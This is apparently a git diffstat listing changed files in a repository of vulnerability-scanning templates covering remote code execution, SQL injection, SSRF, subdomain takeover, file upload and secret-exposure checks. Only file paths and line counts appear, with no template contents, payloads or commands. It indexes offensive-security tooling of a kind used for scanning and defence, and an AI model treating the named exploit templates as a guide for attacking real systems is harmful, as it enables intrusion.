.../ruijie-eg-rce-9927.yaml | 12 +- .../ruijie-networks-rce-9945.yaml | 43 - .../ruijie-networks-rce-9946.yaml | 9 +- .../salesforce-aura-9982.yaml | 18 +- .../salesforce-aura-9984.yaml | 19 + .../samsung-wlan-ap-rce-10007.yaml | 16 +- ...ce-10009.yaml => samsung-wlan-ap-rce.yaml} | 0 poc/remote_code_execution/sangfor-BA-rce.yaml | 41 +- .../sangfor-ba-rce(1).yaml | 17 +- .../sangfor-ba-rce-10020.yaml | 22 + .../sangfor-edr-rce-10025.yaml | 23 +- .../sangfor-edr-rce-10028.yaml | 34 + .../sar2html-rce-10082.yaml | 11 +- poc/remote_code_execution/sar2html-rce.yaml | 20 - .../seacms-rce-10100.yaml | 23 +- .../seacms-rce-10101.yaml | 3 +- .../seowon-router-rce-10147.yaml | 9 +- .../seowon-router-rce-10149.yaml | 6 +- .../showdoc-file-upload-rce-10229.yaml | 44 + .../simple-employee-rce-10279.yaml | 49 + .../simple-employee-rce-10280.yaml | 49 - .../simple-employee-rce.yaml | 2 +- poc/remote_code_execution/spon-ip-rce.yaml | 26 + .../sponip-network-system-ping-rce-10422.yaml | 19 +- .../sponip-network-system-ping-rce-10423.yaml | 30 - .../springboot-h2-db-rce-10454.yaml | 37 - ...e.yaml => springboot-h2-db-rce-10455.yaml} | 0 .../springboot-log4j-rce-10474.yaml | 32 +- .../springboot-log4j-rce.yaml | 41 - poc/remote_code_execution/symfonyrce.yaml | 22 + .../tamronos-rce-10647.yaml | 24 - .../tamronos-rce-10651.yaml | 7 +- .../thinkcmf-rce-10725.yaml | 27 - .../thinkcmf-rce-10727.yaml | 9 +- .../thinkphp-2-rce-10738.yaml | 23 - .../thinkphp-2-rce-10740.yaml | 27 + .../thinkphp-2-rce-10741.yaml | 1 + .../thinkphp-501-rce-10743.yaml | 39 + .../thinkphp-501-rce.yaml | 24 - .../thinkphp-5022-rce-10746.yaml | 14 +- .../unifi-network-log4j-rce-10975.yaml | 48 +- .../unifi-network-log4j-rce.yaml | 48 + .../visual-tools-dvr-rce-11030.yaml | 28 - .../visual-tools-dvr-rce-11032.yaml | 26 - .../visual-tools-dvr-rce.yaml | 4 + .../vmware-horizon-log4j-jndi-rce-11033.yaml | 51 - .../vmware-horizon-log4j-jndi-rce.yaml | 32 + .../vmware-vcenter-log4j-jndi-rce-11050.yaml | 20 +- .../vmware-vcenter-log4j-jndi-rce.yaml | 33 + .../vrealize-operations-log4j-rce-11071.yaml | 17 +- .../vrealize-operations-log4j-rce.yaml | 44 - .../webui-rce-11170.yaml | 21 - .../webui-rce-11172.yaml | 10 +- .../webui-rce-11173.yaml | 9 +- ...ls-verification-for-woocommerce-11271.yaml | 25 + ...s-emails-verification-for-woocommerce.yaml | 10 +- .../wordpress-rce-simplefilelist-11302.yaml | 73 + .../wordpress-rce-simplefilelist.yaml | 39 +- .../wordpress-woocommerce-listing-11338.yaml | 7 +- .../wordpress-woocommerce-listing-11339.yaml | 19 +- .../wordpress-woocommerce-listing-11341.yaml | 23 + .../wordpress-woocommerce-sqli.yaml | 17 +- ...-woocommerce-email-verification-11616.yaml | 16 +- .../wp-woocommerce-file-download-11620.yaml | 38 - .../wp-woocommerce-file-download.yaml | 25 + poc/remote_code_execution/yapi-rce-11724.yaml | 35 +- poc/remote_code_execution/yapi-rce-11725.yaml | 93 + .../yarn-resourcemanager-rce-11735.yaml | 22 + .../yarn-resourcemanager-rce-11737.yaml | 18 +- .../yisaitong-dataImport-rce.yaml | 44 + .../yisaitong-dataimport-rce.yaml | 57 +- .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +- .../grails-database-admin-console-7819.yaml | 16 + .../grails-database-admin-console-7820.yaml | 3 +- .../grails-database-admin-console-7821.yaml | 21 - poc/ruby/grails-database-admin-console.yaml | 26 +- poc/ruby/rails-database-config-9802.yaml | 22 - poc/ruby/rails-database-config-9803.yaml | 20 +- poc/ruby/rails-debug-mode.yaml | 11 +- ...> rails-secret-token-disclosure-9810.yaml} | 0 poc/ruby/rails6-xss-9798.yaml | 32 - ...by-on-rails-framework-exceptions-9920.yaml | 29 + ...by-on-rails-framework-exceptions-9921.yaml | 4 +- poc/samba/samba-config.yaml | 20 - poc/samba/samba-detect-9990.yaml | 10 +- poc/samba/samba-swat-panel.yaml | 16 +- poc/sap/sap-igs-detect-10039.yaml | 15 +- poc/sap/sap-igs-detect-10040.yaml | 17 +- poc/sap/sap-netweaver-detect-10044.yaml | 2 +- poc/sap/sap-netweaver-detect-10047.yaml | 26 - poc/sap/sap-netweaver-info-leak.yaml | 28 + poc/sap/sap-netweaver-webgui-10057.yaml | 15 +- poc/sap/sap-netweaver-webgui-10058.yaml | 20 - poc/sap/sap-recon-detect-10062.yaml | 29 + poc/sap/sap-recon-detect-10063.yaml | 30 - poc/sap/sap-redirect-10064.yaml | 29 - poc/sap/sap-redirect-10067.yaml | 12 +- poc/sap/sap-router-info-leak.yaml | 17 +- poc/sap/sap-web-dispatcher-10075.yaml | 11 +- poc/sap/sap-web-dispatcher-10076.yaml | 15 +- poc/sap/sap-web-dispatcher-10078.yaml | 19 + ...sap-web-dispatcher-admin-portal-10070.yaml | 38 + ...sap-web-dispatcher-admin-portal-10071.yaml | 2 +- poc/search/aws-opensearch-login-649.yaml | 24 + poc/search/aws-opensearch-login-650.yaml | 25 - poc/search/elasticsearch-7193.yaml | 22 - .../elasticsearch-sql-client-detect-7190.yaml | 23 + .../elasticsearch-sql-client-detect.yaml | 21 + poc/search/searchbar.yaml | 4 +- poc/search/searches.yaml | 42 + .../sensitive-storage-exposure-10143.yaml | 29 - .../sensitive-storage-exposure-10144.yaml | 30 + poc/sensitive/sensitive-storage-exposure.yaml | 3 +- poc/shopify/shopify-custom-token(1).yaml | 16 + ...8.yaml => shopify-custom-token-11860.yaml} | 0 poc/shopify/shopify-custom-token.yaml | 5 +- poc/shopify/shopify-private-token-10199.yaml | 13 - poc/shopify/shopify-shared-secret-11862.yaml | 16 + poc/shopify/shopify-shared-secret.yaml | 5 +- poc/shopify/shopify-takeover-10201.yaml | 26 + poc/shopify/shopify-takeover-10203.yaml | 17 +- poc/shopify/shopify-takeover-10204.yaml | 11 +- poc/smtp/easy-wp-smtp-listing-7157.yaml | 20 + poc/smtp/esmtp-detect.yaml | 35 + poc/smtp/esmtprc-config-7259.yaml | 8 +- poc/smtp/esmtprc-config-7260.yaml | 31 + poc/smtp/msmtp-config-8966.yaml | 12 +- poc/smtp/msmtp-config-8967.yaml | 16 +- poc/smtp/smtp-commands-enum.yaml | 39 + poc/smtp/smtp-user-enum.yaml | 41 + poc/smtp/totemomail-smtp-detect.yaml | 26 + poc/social/api-instagram.yaml | 10 +- poc/social/api-twitter-507.yaml | 30 - poc/social/api-twitter.yaml | 24 + poc/social/facebook-secret-11849.yaml | 16 + poc/social/facebook-secret-7386.yaml | 16 - .../flow-flow-social-stream-xss-7524.yaml | 41 - poc/social/flow-flow-social-stream-xss.yaml | 27 + poc/social/linkedin-client-id.yaml | 16 - poc/social/linkedin-id.yaml | 3 +- poc/social/sassy-social-share-10086.yaml | 26 + poc/social/sassy-social-share-xss.yaml | 56 +- ...are-10083.yaml => sassy-social-share.yaml} | 0 poc/social/twitter-secret(1).yaml | 16 - poc/social/twitter-secret-10862.yaml | 13 + poc/social/twitter-secret.yaml | 7 +- ...eed.yaml => wordpress-instagram-feed.yaml} | 0 poc/social/wp-socialfit-xss-11577.yaml | 27 - poc/sql/74cms-sqli-10.yaml | 17 - poc/sql/74cms-sqli-9.yaml | 7 +- poc/sql/ASUSTOR-ADM-sqli.yaml | 6 +- poc/sql/CRMEB-sqli.yaml | 2 - poc/sql/GLPI-9.3.3-SQL-Injection.yaml | 19 +- poc/sql/SQLInjection_ERROR.yaml | 51 - poc/sql/adb-backup-enabled-62.yaml | 15 + poc/sql/adb-backup-enabled-63.yaml | 16 - poc/sql/adb-backup-enabled.yaml | 13 +- .../android-debug-database-exposed-314.yaml | 24 + .../android-debug-database-exposed-315.yaml | 4 +- poc/sql/api-abuseipdb-384.yaml | 41 + poc/sql/api-abuseipdb.yaml | 31 - poc/sql/buildbot-panel.yaml | 44 +- poc/sql/buildbot-panel.yml | 25 - poc/sql/chamilo-lms-sqli-892.yaml | 2 +- poc/sql/chanjet-CRM-sqli.yaml | 2 + poc/sql/couchdb-adminparty-1237.yaml | 39 + poc/sql/couchdb-exposure-1238.yaml | 25 - poc/sql/couchdb-exposure-1239.yaml | 24 + poc/sql/couchdb-exposure-1241.yaml | 1 + poc/sql/database-error-6768.yaml | 7 +- poc/sql/database-error-6771.yaml | 8 +- poc/sql/db-backup-lfi-6774.yaml | 7 +- poc/sql/db-backup-lfi-6776.yaml | 11 +- poc/sql/dbeaver-credentials-6780.yaml | 26 + poc/sql/dbeaver-credentials-6781.yaml | 11 +- poc/sql/dbeaver-credentials-6782.yaml | 25 - poc/sql/dedecms-membergroup-sqli-6796.yaml | 20 - poc/sql/dedecms-membergroup-sqli-6799.yaml | 10 +- poc/sql/duomicms-sql-injection-7122.yaml | 21 + poc/sql/duomicms-sql-injection-7125.yaml | 11 +- .../elasticsearch-sql-client-detect-7190.yaml | 23 + poc/sql/elasticsearch-sql-client-detect.yaml | 21 + poc/sql/error-based-sql-injection-7249.yaml | 484 - poc/sql/etouch-v2-sqli.yaml | 22 + poc/sql/exposed-mysql-initial-7322.yaml | 7 +- poc/sql/exposed-mysql-initial.yaml | 21 - poc/sql/firebase-database-7490.yaml | 4 +- poc/sql/glpi-9.3.3-sql-injection.yaml | 25 + .../grails-database-admin-console-7819.yaml | 16 + .../grails-database-admin-console-7820.yaml | 3 +- .../grails-database-admin-console-7821.yaml | 21 - poc/sql/grails-database-admin-console.yaml | 26 +- poc/sql/hasura-graphql-psql-exec-7902.yaml | 36 - poc/sql/hasura-graphql-psql-exec.yaml | 42 + poc/sql/influxdb-detect-8159.yaml | 34 + poc/sql/jdbc-connection-string-8244.yaml | 22 + poc/sql/jdbc-connection-string.yaml | 15 - poc/sql/kevinlab-bems-sqli-8460.yaml | 42 + poc/sql/kevinlab-bems-sqli.yaml | 33 - poc/sql/mdb-database-file-8795.yaml | 13 +- poc/sql/mdb-database-file-8796.yaml | 13 +- ...micro-focus-ucmdb-default-credentials.yaml | 2 - poc/sql/mongodb-ops-manager-8922.yaml | 20 - poc/sql/mongodb-unauth-8928.yaml | 4 +- poc/sql/mongodb-unauth.yaml | 26 - poc/sql/msvod-sqli.yaml | 2 + poc/sql/openerp-database-9275.yaml | 18 - poc/sql/openerp-database-9277.yaml | 22 + poc/sql/openerp-database.yaml | 17 +- poc/sql/oracle-dbass-detect-9350.yaml | 7 +- poc/sql/oracle-dbass-detect-9351.yaml | 21 + poc/sql/oracle-dbcs-9353.yaml | 8 +- poc/sql/oracle-dbcs-9354.yaml | 7 +- .../oracle-ebs-sqllog-disclosure-9370.yaml | 21 +- .../oracle-ebs-sqllog-disclosure-9371.yaml | 30 - .../pbootcms-database-file-download-9469.yaml | 29 - poc/sql/pbootcms-database-file-download.yaml | 20 +- poc/sql/phpmyadmin-sql-9534.yaml | 1 - poc/sql/phpmyadmin-sql-9535.yaml | 31 - poc/sql/phpmyadmin-sql-9536.yaml | 24 + poc/sql/phpok-sqli-9538.yaml | 17 +- poc/sql/pikpikcusqli.yaml | 47 + ...ct-9718.yaml => puppetdb-detect-9719.yaml} | 0 poc/sql/puppetdb-detect.yaml | 26 + poc/sql/python-app-sql-exceptions-9744.yaml | 26 - poc/sql/python-app-sql-exceptions.yaml | 20 + poc/sql/rails-database-config-9802.yaml | 22 - poc/sql/rails-database-config-9803.yaml | 20 +- poc/sql/sequoiadb-default-login-10150.yaml | 9 +- poc/sql/sequoiadb-default-login-10151.yaml | 37 - poc/sql/sequoiadb-default-login-10152.yaml | 45 + poc/sql/simple-crm-sql-injection-10278.yaml | 41 + poc/sql/site-map-sql-injection.yaml | 53 +- poc/sql/springboot-h2-db-rce-10454.yaml | 37 - ...e.yaml => springboot-h2-db-rce-10455.yaml} | 0 poc/sql/sql-dump-10497.yaml | 43 - poc/sql/sql-dump.yaml | 19 +- poc/sql/sql-injection.yaml | 94 +- poc/sql/sql-server-reporting-10509.yaml | 13 + poc/sql/sql-server-reporting-10510.yaml | 11 +- poc/sql/sqli.yaml | 47 - poc/sql/sqli2.yaml | 86 +- poc/sql/sqliheader.yaml | 25 - ... suspicious-sql-error-messages-10585.yaml} | 0 .../suspicious-sql-error-messages-10586.yaml | 17 +- poc/sql/symfony-database-config-10617.yaml | 17 +- ...0616.yaml => symfony-database-config.yaml} | 0 poc/sql/thumbs-db-disclosure-10761.yaml | 21 + poc/sql/thumbs-db-disclosure-10762.yaml | 3 + poc/sql/thumbs-db-disclosure-10763.yaml | 23 - poc/sql/tidb-unauth-10771.yaml | 14 +- poc/sql/tidb-unauth-10772.yaml | 28 - poc/sql/ucmdb-default-login-10871.yaml | 35 + poc/sql/ucmdb-default-login.yaml | 41 - poc/sql/weiphp-sql-injection-11190.yaml | 11 +- .../wordpress-db-backup-listing-11250.yaml | 6 +- poc/sql/wordpress-db-repair.yaml | 26 + poc/sql/wordpress-woocommerce-sqli.yaml | 17 +- poc/sql/wuzhicms-sqli-11656.yaml | 41 - poc/sql/xdcms-sqli-11664.yaml | 30 - poc/sql/xdcms-sqli-11667.yaml | 11 +- poc/sql/xdcms-sqli.yaml | 31 - ...cread.yaml => yongyou-icurrtype-sqli.yaml} | 0 poc/sql/yonyou-nc-downtax-sqli.yaml | 23 + poc/sql/yonyou-nc-warningdetailinfo-sqli.yaml | 25 + poc/sql/zcms-v3-sqli-11773.yaml | 21 - poc/sql/zcms-v3-sqli-11775.yaml | 14 +- poc/sql/zhixiangOA-msglog.aspx-sql.yaml | 4 +- poc/sql_injection/74cms-sqli-10.yaml | 17 - poc/sql_injection/74cms-sqli-9.yaml | 7 +- poc/sql_injection/ASUSTOR-ADM-sqli.yaml | 6 +- poc/sql_injection/CRMEB-sqli.yaml | 2 - poc/sql_injection/SQLInjection_ERROR.yaml | 51 - poc/sql_injection/chamilo-lms-sqli-892.yaml | 2 +- poc/sql_injection/chanjet-CRM-sqli.yaml | 2 + .../dedecms-membergroup-sqli-6796.yaml | 20 - .../dedecms-membergroup-sqli-6799.yaml | 10 +- poc/sql_injection/etouch-v2-sqli.yaml | 22 + .../kevinlab-bems-sqli-8460.yaml | 42 + poc/sql_injection/kevinlab-bems-sqli.yaml | 33 - poc/sql_injection/msvod-sqli.yaml | 2 + poc/sql_injection/phpok-sqli-9538.yaml | 17 +- poc/sql_injection/sqli2.yaml | 86 +- poc/sql_injection/sqliheader.yaml | 25 - .../wordpress-woocommerce-sqli.yaml | 17 +- poc/sql_injection/wuzhicms-sqli-11656.yaml | 41 - poc/sql_injection/xdcms-sqli-11664.yaml | 30 - poc/sql_injection/xdcms-sqli-11667.yaml | 11 +- poc/sql_injection/xdcms-sqli.yaml | 31 - poc/sql_injection/yongyou-icurrtype-sqli.yaml | 37 + poc/sql_injection/yonyou-nc-downtax-sqli.yaml | 23 + .../yonyou-nc-warningdetailinfo-sqli.yaml | 25 + poc/sql_injection/zcms-v3-sqli-11773.yaml | 21 - poc/sql_injection/zcms-v3-sqli-11775.yaml | 14 +- poc/ssh/circleci-ssh-config-928.yaml | 17 +- poc/ssh/ssh-authorized-keys-10523.yaml | 22 +- poc/ssh/ssh-known-hosts-10524.yaml | 22 +- poc/ssrf/apachesolrlfissrf.yaml | 53 +- poc/ssrf/cloudflare-image-ssrf-1021.yaml | 9 +- poc/ssrf/cloudflare-image-ssrf-1022.yaml | 23 + poc/ssrf/cloudflare-image-ssrf-1023.yaml | 8 +- poc/ssrf/confluence-ssrf-sharelinks-1191.yaml | 31 +- poc/ssrf/confluence-ssrf-sharelinks-1192.yaml | 44 + poc/ssrf/confluence-ssrf-sharelinks-1193.yaml | 36 - poc/ssrf/hasura-graphql-ssrf-7904.yaml | 3 +- poc/ssrf/hasura-graphql-ssrf-7905.yaml | 47 - poc/ssrf/linkerd-ssrf-8641.yaml | 5 +- ...8859.yaml => microstrategy-ssrf-8860.yaml} | 0 poc/ssrf/microstrategy-ssrf-8861.yaml | 24 - poc/ssrf/openbmcs-ssrf-9261.yaml | 40 + poc/ssrf/openbmcs-ssrf.yaml | 27 - poc/ssrf/ssrf-via-oauth-misconfig-10526.yaml | 31 - poc/ssrf/ssrf-via-oauth-misconfig-10527.yaml | 14 +- poc/ssrf/targa-camera-ssrf-10658.yaml | 30 - poc/ssrf/targa-camera-ssrf.yaml | 23 + poc/ssrf/umbraco-base-ssrf-10880.yaml | 24 - poc/ssrf/umbraco-base-ssrf-10881.yaml | 28 + poc/ssrf/umbraco-base-ssrf-10882.yaml | 25 +- poc/ssrf/vmware-vcenter-ssrf-11051.yaml | 12 +- poc/ssrf/vmware-vcenter-ssrf-11053.yaml | 24 + poc/ssrf/vmware-vcenter-ssrf.yaml | 21 + poc/ssrf/w3c-total-cache-ssrf-11081.yaml | 7 +- poc/ssrf/wp-multiple-theme-ssrf-11513.yaml | 31 + poc/ssrf/xmlrpc-pingback-ssrf-11687.yaml | 29 - poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml | 28 + poc/ssrf/xmlrpc-pingback-ssrf.yaml | 11 +- poc/ssrf/yongyou-ssrf-11745.yaml | 18 + poc/ssrf/yongyou-ssrf.yaml | 7 +- poc/ssrf/zimbra-preauth-ssrf-11810.yaml | 16 +- ...rf.yaml => zimbra-preauth-ssrf-11811.yaml} | 0 .../acquia-takeover-35.yaml | 21 + .../aftership-takeover-203.yaml | 22 + .../aftership-takeover-204.yaml | 19 - .../agilecrm-takeover-208.yaml | 18 - .../agilecrm-takeover-209.yaml | 21 +- poc/subdomain_takeover/aha-takeover-214.yaml | 22 + poc/subdomain_takeover/aha-takeover-215.yaml | 7 +- poc/subdomain_takeover/aha-takeover-216.yaml | 15 - .../airee-takeover-227.yaml | 16 - .../airee-takeover-228.yaml | 20 + poc/subdomain_takeover/airee-takeover.yaml | 17 +- .../anima-takeover-317.yaml | 15 + .../anima-takeover-318.yaml | 19 - .../announcekit-takeover-324.yaml | 14 +- .../aws-bucket-takeover-630.yaml | 24 + .../aws-bucket-takeover-632.yaml | 20 - .../aws-bucket-takeover.yaml | 8 +- .../azure-takeover-detection-681.yaml | 40 - .../azure-takeover-detection-683.yaml | 29 +- .../bigcartel-takeover-727.yaml | 23 - .../bigcartel-takeover-729.yaml | 15 + .../brightcove-takeover-783.yaml | 19 - .../brightcove-takeover-785.yaml | 15 + .../brightcove-takeover.yaml | 8 +- .../canny-takeover-854.yaml | 8 +- .../cargo-takeover-866.yaml | 15 + .../cargo-takeover-868.yaml | 15 - poc/subdomain_takeover/cargo-takeover.yaml | 19 +- .../cargocollective-takeover-864.yaml | 17 + .../cargocollective-takeover-865.yaml | 20 - .../detect-all-takeover.yaml | 570 +- .../fastly-takeover-7430.yaml | 2 +- .../flexbe-takeover-7505.yaml | 23 + .../flexbe-takeover-7506.yaml | 27 - .../flywheel-takeover-7526.yaml | 20 + poc/subdomain_takeover/flywheel-takeover.yaml | 21 +- poc/subdomain_takeover/flywheel_takeover.yaml | 19 - .../freshdesk-takeover-7541.yaml | 26 - .../gemfury-takeover-7576.yaml | 15 + .../gemfury-takeover-7577.yaml | 19 - .../gemfury-takeover-7579.yaml | 5 +- .../getresponse-takeover-7607.yaml | 3 +- .../getresponse-takeover-7610.yaml | 8 +- .../ghost-takeover-7619.yaml | 16 + .../ghost-takeover-7622.yaml | 24 - poc/subdomain_takeover/ghost-takeover.yaml | 27 +- .../github-takeover-7658.yaml | 7 +- .../hatenablog-takeover-7907.yaml | 15 + .../hatenablog-takeover-7910.yaml | 18 - .../hatenablog-takeover.yaml | 24 +- .../helpjuice-takeover-7925.yaml | 2 +- .../helpjuice-takeover-7926.yaml | 19 + .../helpjuice-takeover-7927.yaml | 15 - .../helprace-takeover-7929.yaml | 16 + .../helprace-takeover-7932.yaml | 20 - .../helpscout-takeover-7934.yaml | 20 - .../helpscout-takeover-7935.yaml | 15 + .../helpscout-takeover.yaml | 19 +- .../heroku-takeover-7941.yaml | 17 + .../heroku-takeover-7942.yaml | 15 +- .../hubspot-takeover-8077.yaml | 17 + .../hubspot-takeover-8078.yaml | 17 - poc/subdomain_takeover/hubspot-takeover.yaml | 22 +- .../intercom-takeover-8167.yaml | 21 - .../intercom-takeover-8168.yaml | 9 +- .../jazzhr-takeover-8234.yaml | 19 + poc/subdomain_takeover/jazzhr-takeover.yaml | 17 +- .../jetbrains-takeover-8294.yaml | 18 - .../jetbrains-takeover.yaml | 18 +- .../kinsta-takeover-8494.yaml | 15 - ...-8567.yaml => landingi-takeover-8566.yaml} | 0 .../launchrock-takeover-8602.yaml | 8 +- .../launchrock-takeover-8603.yaml | 10 +- .../launchrock-takeover-8604.yaml | 15 - .../launchrock-takeover-8605.yaml | 18 - .../mashery-takeover-8783.yaml | 15 + .../mashery-takeover-8785.yaml | 15 - poc/subdomain_takeover/mashery-takeover.yaml | 2 +- ...er-8797.yaml => medium-takeover-8798.yaml} | 0 poc/subdomain_takeover/medium-takeover.yaml | 7 +- .../ngrok-takeover-9128.yaml | 16 + .../ngrok-takeover-9129.yaml | 5 +- .../pantheon-takeover-9461.yaml | 18 + poc/subdomain_takeover/pantheon-takeover.yaml | 23 +- poc/subdomain_takeover/pingdom-takeover.yaml | 23 +- .../proposify-takeover-9694.yaml | 19 - .../proposify-takeover.yaml | 14 +- .../readme-takeover-9841.yaml | 18 + .../readme-takeover-9843.yaml | 15 - ...47.yaml => readthedocs-takeover-9844.yaml} | 0 .../readthedocs-takeover-9846.yaml | 5 +- .../s3-subtakeover-9967.yaml | 20 + .../shopify-takeover-10201.yaml | 26 + .../shopify-takeover-10203.yaml | 17 +- .../shopify-takeover-10204.yaml | 11 +- .../simplebooklet-takeover-10271.yaml | 15 + .../simplebooklet-takeover-10273.yaml | 5 +- .../simplebooklet-takeover-10274.yaml | 18 - .../smartjob-takeover-10323.yaml | 21 - .../smartjob-takeover-10324.yaml | 17 + poc/subdomain_takeover/smartjob-takeover.yaml | 21 +- .../smartling-takeover-10326.yaml | 2 +- .../smugmug-takeover-10340.yaml | 7 +- .../sprintful-takeover-10494.yaml | 24 - .../sprintful-takeover-10495.yaml | 29 + .../sprintful-takeover.yaml | 18 +- .../strikingly-takeover-10551.yaml | 17 + .../surge-takeover-10579.yaml | 3 +- .../surveygizmo-takeover-10581.yaml | 15 + .../surveygizmo-takeover-10582.yaml | 16 - .../surveygizmo-takeover.yaml | 14 +- .../tave-takeover-10659.yaml | 15 - .../tave-takeover-10660.yaml | 5 +- .../tave-takeover-10662.yaml | 18 + .../teamwork-takeover-10668.yaml | 15 + .../teamwork-takeover-10669.yaml | 16 - poc/subdomain_takeover/teamwork-takeover.yaml | 22 +- .../tictail-takeover-10767.yaml | 18 - .../tictail-takeover-10768.yaml | 17 + .../tictail-takeover-10769.yaml | 20 - poc/subdomain_takeover/tictail-takeover.yaml | 7 +- .../tilda-takeover-10781.yaml | 2 +- .../tilda-takeover-10783.yaml | 20 + .../tilda-takeover-10784.yaml | 24 - .../tumblr-takeover-10845.yaml | 17 + .../tumblr-takeover-10847.yaml | 24 - .../uberflip-takeover-10864.yaml | 15 + .../uberflip-takeover-10867.yaml | 18 - poc/subdomain_takeover/uberflip-takeover.yaml | 22 +- ...9.yaml => uptimerobot-takeover-10987.yaml} | 0 ...er-10997.yaml => vend-takeover-10998.yaml} | 0 .../webflow-takeover-11131.yaml | 15 - .../webflow-takeover-11132.yaml | 8 +- .../webflow-takeover-11134.yaml | 18 + poc/subdomain_takeover/webflow-takeover.yaml | 23 +- .../wishpond-takeover-11215.yaml | 15 + .../wishpond-takeover-11216.yaml | 16 - .../wordpress-takeover.yaml | 23 +- .../worksites-takeover-11388.yaml | 3 +- .../wufoo-takeover-11648.yaml | 2 +- ...r-11649.yaml => wufoo-takeover-11650.yaml} | 0 .../zendesk-takeover-11780.yaml | 8 +- .../zendesk-takeover-11781.yaml | 16 + .../zendesk-takeover-11783.yaml | 18 - .../pdf-signer-ssti-to-rce-9470.yaml | 20 + .../pdf-signer-ssti-to-rce-9471.yaml | 3 +- poc/upload/dahua-publishing-fileupload.yaml | 25 +- .../dahua-wpms-addimgico-fileupload.yaml | 78 +- .../exposed-jquery-file-upload-7315.yaml | 19 +- poc/upload/exposed-jquery-file-upload.yaml | 22 - ...luftguitar-arbitrary-file-upload-8672.yaml | 32 - .../luftguitar-arbitrary-file-upload.yaml | 23 + poc/upload/oa-v9-uploads-file-9189.yaml | 20 +- ...9190.yaml => oa-v9-uploads-file-9191.yaml} | 0 poc/upload/showdoc-file-upload-rce-10229.yaml | 44 + .../telerik-fileupload-detect-10693.yaml | 14 +- .../telerik-fileupload-detect-10695.yaml | 13 - poc/upload/ueditor-file-upload-10875.yaml | 24 + ...ad-10872.yaml => ueditor-file-upload.yaml} | 0 .../unauthenticated-popup-upload-10922.yaml | 20 + .../unauthenticated-popup-upload-10923.yaml | 24 - poc/upload/wordpress-upload-data.yaml | 55 +- poc/upload/wp-upload-data-11602.yaml | 24 + poc/upload/wp-upload-data-11605.yaml | 29 - poc/upload/zhiyuan-file-upload-11795.yaml | 24 - poc/upload/zhiyuan-file-upload.yaml | 28 - poc/vmware/vmware-horizon-11040.yaml | 20 - poc/vmware/vmware-horizon-11041.yaml | 21 + .../vmware-horizon-log4j-jndi-rce-11033.yaml | 51 - poc/vmware/vmware-horizon-log4j-jndi-rce.yaml | 32 + poc/vmware/vmware-horizon-panel-11037.yaml | 22 + poc/vmware/vmware-horizon-panel.yaml | 20 +- poc/vmware/vmware-horizon.yaml | 4 - .../vmware-vcenter-lfi-linux-11042.yaml | 14 - .../vmware-vcenter-lfi-linux-11044.yaml | 26 +- poc/vmware/vmware-vcenter-lfi.yaml | 34 - .../vmware-vcenter-log4j-jndi-rce-11050.yaml | 20 +- poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml | 33 + poc/vmware/vmware-vcenter-ssrf-11051.yaml | 12 +- poc/vmware/vmware-vcenter-ssrf-11053.yaml | 24 + poc/vmware/vmware-vcenter-ssrf.yaml | 21 + poc/vmware/vmware-version-detect-11054.yaml | 63 - poc/vmware/vmware-version-detect.yaml | 23 +- ...yaml => vmware-vrealize-detect-11058.yaml} | 0 poc/vmware/vmware-vrealize-detect.yaml | 30 + poc/vmware/vmware-workflow-11060.yaml | 11 + ...rkflow-11059.yaml => vmware-workflow.yaml} | 0 ...erver-12.yaml => abyss-web-server-13.yaml} | 0 poc/web/abyss-web-server.yaml | 25 - poc/web/alphaweb-default-login-275.yaml | 45 + poc/web/alphaweb-default-login-277.yaml | 14 +- poc/web/artica-web-proxy-detect-543.yaml | 18 + poc/web/artica-web-proxy-detect-544.yaml | 12 +- poc/web/axigen-webadmin-659.yaml | 9 +- poc/web/axigen-webmail-662.yaml | 14 +- poc/web/axigen-webmail-663.yaml | 40 + poc/web/axigen-webmail-664.yaml | 28 +- poc/web/azkaban-web-client-676.yaml | 32 + poc/web/azkaban-web-client-680.yaml | 10 +- ...lient-679.yaml => azkaban-web-client.yaml} | 0 poc/web/boa-web-fileread.yaml | 5 - poc/web/codemeter-webadmin-panel-1135.yaml | 14 +- poc/web/dixell-xweb500-filewrite-7019.yaml | 8 +- poc/web/dixell-xweb500-filewrite.yaml | 31 - poc/web/epson-web-control-detect.yaml | 5 +- ...=> ewebs-arbitrary-file-reading-7271.yaml} | 0 .../ewebs-arbitrary-file-reading-7273.yaml | 15 +- poc/web/fortiweb-panel-7537.yaml | 25 - poc/web/fortiweb-panel-7539.yaml | 25 + poc/web/fortiweb-panel.yaml | 18 +- poc/web/geovision-geowebserver-lfi-7596.yaml | 17 +- poc/web/geovision-geowebserver-lfi-7597.yaml | 15 +- poc/web/geovision-geowebserver-xss-7600.yaml | 19 +- poc/web/geovision-geowebserver-xss.yaml | 27 - poc/web/honeywell-web-controller-7995.yaml | 47 +- ...e.yaml => icewarp-webclient-rce-8129.yaml} | 0 poc/web/icewarp-webclient-rce-8133.yaml | 7 +- poc/web/icinga-web-login-8134.yaml | 3 +- poc/web/icinga-web-login-8136.yaml | 23 - poc/web/icinga-web-login-8137.yaml | 23 + poc/web/iplanet-web-server-8190.yaml | 9 +- poc/web/iplanet-web-server-8191.yaml | 21 + poc/web/microsoft-teams-webhook-8858.yaml | 15 + ...8856.yaml => microsoft-teams-webhook.yaml} | 0 poc/web/microweber-detect-8862.yaml | 26 - poc/web/microweber-detect-8863.yaml | 5 +- poc/web/microweber-xss-8864.yaml | 12 +- poc/web/microweber-xss.yaml | 35 - poc/web/netsurveillance-web-9057.yaml | 35 - poc/web/netsurveillance-web.yaml | 22 + poc/web/netsweeper-webadmin-detect-9068.yaml | 38 - poc/web/opennms-web-console-9287.yaml | 3 +- poc/web/opennms-web-console.yaml | 22 +- poc/web/oracle-iplanet-web-server-9393.yaml | 26 + poc/web/oracle-iplanet-web-server.yaml | 21 + poc/web/r-webserver-login.yaml | 22 +- poc/web/ruijie-EWEB-rce.yaml | 5 +- poc/web/sap-netweaver-webgui-10057.yaml | 15 +- poc/web/sap-netweaver-webgui-10058.yaml | 20 - poc/web/sap-web-dispatcher-10075.yaml | 11 +- poc/web/sap-web-dispatcher-10076.yaml | 15 +- poc/web/sap-web-dispatcher-10078.yaml | 19 + ...sap-web-dispatcher-admin-portal-10070.yaml | 38 + ...sap-web-dispatcher-admin-portal-10071.yaml | 2 +- poc/web/slack-webhook-11865.yaml | 3 - poc/web/slack-webhook.yaml | 3 +- poc/web/spark-webui-unauth-10401.yaml | 6 +- poc/web/spark-webui-unauth.yaml | 15 +- poc/web/web-config-11124.yaml | 22 +- 